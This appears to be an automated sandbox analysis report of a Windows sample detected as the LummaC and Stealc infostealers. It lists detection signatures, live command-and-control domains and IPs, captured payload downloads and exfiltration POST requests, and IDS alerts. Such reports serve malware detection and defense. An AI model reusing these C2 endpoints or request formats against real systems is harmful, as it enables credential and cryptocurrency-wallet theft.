Windows Analysis Report
BVGvbpplT8.exe

Overview

General Information

Sample name: BVGvbpplT8.exe
renamed because original name is a hash value
Original sample name: 6cc52eb35f095e2a0e4df669c998af29.exe
Analysis ID: 1579779
MD5: 6cc52eb35f095e2a0e4df669c998af29
SHA1: 82c35ea91513438ca6208b5b41e33bb94ff858d7
SHA256: 6c9ffc9867092f84baf32fb0fe858b1258df4d371ef2c67c2795e947927d9e7f
Tags: exeuser-abuse_ch
Infos:

Detection

LummaC, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: BVGvbpplT8.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 0000000E.00000002.2628879138.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: BVGvbpplT8.exe.4060.1.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["discokeyus.lat", "grannyejh.lat", "necklacebudi.lat", "rapeflowwj.lat", "aspecteirs.lat", "crosshuaht.lat", "energyaffai.lat", "sustainskelet.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}
Multi AV Scanner detection for submitted file
Source: BVGvbpplT8.exe Virustotal: Detection: 54% Perma Link
Source: BVGvbpplT8.exe ReversingLabs: Detection: 63%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\44WNAJWW05E0258PKFVID8DSXYO93MX.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\O215CKAM4VJZ3EV7.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: BVGvbpplT8.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: BVGvbpplT8.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49788 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 44WNAJWW05E0258PKFVID8DSXYO93MX.exe, 0000000D.00000002.2650233519.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\Desktop\BVGvbpplT8.exe Directory queried: number of queries: 1001

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.6:57576 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.6:57472 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.6:50225 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.6:53952 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.6:60527 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.6:54160 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.6:63226 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.6:58783 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.6:61793 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49833 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49721 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49721 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49719 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49730 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49730 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49737 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49788 -> 104.21.66.86:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: sweepyribs.lat
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 23 Dec 2024 08:00:34 GMTContent-Type: application/octet-streamContent-Length: 2765312Last-Modified: Mon, 23 Dec 2024 07:19:04 GMTConnection: keep-aliveETag: "67690ee8-2a3200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2a 00 00 04 00 00 fa c9 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 62 72 64 6f 66 70 68 65 00 c0 29 00 00 a0 00 00 00 a2 29 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 7a 6f 61 6c 76 6f 76 00 20 00 00 00 60 2a 00 00 06 00 00 00 0a 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2a 00 00 22 00 00 00 10 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 23 Dec 2024 08:00:41 GMTContent-Type: application/octet-streamContent-Length: 2835456Last-Modified: Mon, 23 Dec 2024 07:21:00 GMTConnection: keep-aliveETag: "67690f5c-2b4400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 70 4e 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 4e 00 00 04 00 00 84 4c 2b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 6e 71 72 69 63 72 6f 00 a0 29 00 00 c0 24 00 00 a0 29 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6a 6c 76 79 6c 64 6c 00 10 00 00 00 60 4e 00 00 06 00 00 00 1c 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4e 00 00 22 00 00 00 22 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCBKKFIJJJECAAFCGIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 38 44 41 45 37 33 45 46 34 35 39 32 33 39 38 39 38 39 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 2d 2d 0d 0a Data Ascii: ------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="hwid"98DAE73EF4592398989009------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="build"stok------CFHCBKKFIJJJECAAFCGI--
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View IP Address: 104.102.49.254 104.102.49.254
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49719 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49730 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49737 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49748 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49762 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49769 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49788 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49776 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49794 -> 185.215.113.16:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U070AFP0TCUK0IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12835Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KW5VUXN1XBOKEOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DX30IFQIT2P391YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19945Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IDFEWNNYDJAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1193Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UVKQ2556L6N22User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572166Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
